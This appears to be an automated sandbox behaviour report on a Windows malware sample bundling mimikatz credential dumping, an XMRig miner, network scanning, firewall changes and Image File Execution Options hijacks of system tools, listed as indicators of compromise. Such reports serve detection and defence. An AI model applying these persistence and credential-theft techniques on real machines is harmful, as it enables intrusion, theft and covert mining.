Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29-08-2024 20:48
Behavioral task
behavioral1
Sample
2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe
-
Size
8.4MB
-
MD5
859b17e197ffa01d1c29a78ba257ae85
-
SHA1
942a2627d669ed570f546a7692410c6f33ad9cf9
-
SHA256
75712c0c2599fac181ac93bbc61c512c1c4ade9071e5a128b4a7ca0d04ed61be
-
SHA512
65c1093d44e35131a0912dd4b17d6befb3ed5302cae452d29036d8adbfcbc2cbb4356c69ea8846279b8f6a6f26c8f103e7491d23b835072c17cd415041f934db
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4772 created 1704 4772 ceitlwt.exe 37 -
Contacts a large (20033) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4512-178-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-182-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-199-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-216-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-221-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-234-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-251-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-254-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-255-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig behavioral2/memory/4512-257-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3944-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3944-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x00070000000234d4-6.dat mimikatz behavioral2/memory/3268-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/668-138-0x00007FF691290000-0x00007FF69137E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ceitlwt.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe ceitlwt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" ceitlwt.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2748 netsh.exe 1412 netsh.exe -
Executes dropped EXE 30 IoCs
pid Process 3268 ceitlwt.exe 4772 ceitlwt.exe 4700 wpcap.exe 2312 vgcgjtnzb.exe 668 vfshost.exe 2416 gyzjuuiut.exe 5076 xohudmc.exe 3652 kcyycg.exe 4512 iggias.exe 3000 gyzjuuiut.exe 3500 gyzjuuiut.exe 2960 gyzjuuiut.exe 3240 gyzjuuiut.exe 4796 gyzjuuiut.exe 3796 gyzjuuiut.exe 4412 gyzjuuiut.exe 4564 gyzjuuiut.exe 1184 gyzjuuiut.exe 4044 ceitlwt.exe 4648 gyzjuuiut.exe 4364 gyzjuuiut.exe 1064 gyzjuuiut.exe 3808 gyzjuuiut.exe 3824 gyzjuuiut.exe 4876 gyzjuuiut.exe 2812 gyzjuuiut.exe 3804 gyzjuuiut.exe 4648 gyzjuuiut.exe 5060 ujtcpitiu.exe 5808 ceitlwt.exe -
Loads dropped DLL 12 IoCs
pid Process 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 4700 wpcap.exe 2312 vgcgjtnzb.exe 2312 vgcgjtnzb.exe 2312 vgcgjtnzb.exe -
resource yara_rule behavioral2/files/0x0007000000023526-134.dat upx behavioral2/memory/668-136-0x00007FF691290000-0x00007FF69137E000-memory.dmp upx behavioral2/memory/668-138-0x00007FF691290000-0x00007FF69137E000-memory.dmp upx behavioral2/files/0x0007000000023531-141.dat upx behavioral2/memory/2416-142-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/2416-150-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/files/0x000700000002352e-163.dat upx behavioral2/memory/4512-165-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/3000-171-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/3500-175-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-178-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/2960-180-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-182-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/3240-185-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4796-189-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/3796-193-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4412-197-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-199-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/4564-202-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/1184-206-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4648-214-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-216-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/4364-219-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-221-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/1064-224-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/3808-228-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/3824-231-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4876-233-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-234-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/2812-236-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/3804-238-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4648-240-0x00007FF642DA0000-0x00007FF642DFB000-memory.dmp upx behavioral2/memory/4512-251-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/4512-254-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/4512-255-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx behavioral2/memory/4512-257-0x00007FF7FEE70000-0x00007FF7FEF90000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 96 ifconfig.me 97 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE ceitlwt.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ceitlwt.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE ceitlwt.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ceitlwt.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\kcyycg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\kcyycg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ceitlwt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ceitlwt.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bjvibcuuu\UnattendGC\specials\exma-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\docmicfg.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\Shellcode.ini ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\wpcap.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\tibe-2.dll ceitlwt.exe File created C:\Windows\iyvumtbf\vimpcsvc.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\Corporate\mimilib.dll ceitlwt.exe File opened for modification C:\Windows\bjvibcuuu\vrituptli\Packet.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\svschost.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\docmicfg.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\svschost.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\tucl-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\xdvl-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\vimpcsvc.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\schoedcl.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\Corporate\mimidrv.sys ceitlwt.exe File opened for modification C:\Windows\bjvibcuuu\Corporate\log.txt cmd.exe File created C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\cnli-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\posh-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\zlib1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\docmicfg.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\schoedcl.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\vimpcsvc.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\schoedcl.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\wpcap.dll ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\docmicfg.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\spoolsrv.xml ceitlwt.exe File created C:\Windows\iyvumtbf\svschost.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\Corporate\vfshost.exe ceitlwt.exe File created C:\Windows\ime\ceitlwt.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\svschost.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\vimpcsvc.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\spoolsrv.xml ceitlwt.exe File created C:\Windows\iyvumtbf\spoolsrv.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\spoolsrv.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\ucl.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\AppCapture32.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\ip.txt ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\crli-0.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\vimpcsvc.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\scan.bat ceitlwt.exe File created C:\Windows\iyvumtbf\ceitlwt.exe 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\trfo-2.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\ujtcpitiu.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\trch-1.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\svschost.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\schoedcl.xml ceitlwt.exe File opened for modification C:\Windows\bjvibcuuu\vrituptli\Result.txt ujtcpitiu.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\coli-0.dll ceitlwt.exe File created C:\Windows\iyvumtbf\schoedcl.xml ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\AppCapture64.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\upbdrjv\swrpwe.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\ssleay32.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\vrituptli\Packet.dll ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\libeay32.dll ceitlwt.exe File created C:\Windows\iyvumtbf\docmicfg.xml ceitlwt.exe File opened for modification C:\Windows\iyvumtbf\ceitlwt.exe 2024-08-29_859b17e197ffa01d1c29a78ba257ae85_hacktools_icedid_mimikatz.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\spoolsrv.exe ceitlwt.exe File created C:\Windows\bjvibcuuu\UnattendGC\specials\libxml2.dll ceitlwt.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1608 sc.exe 388 sc.exe 5028 sc.exe 4572 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key 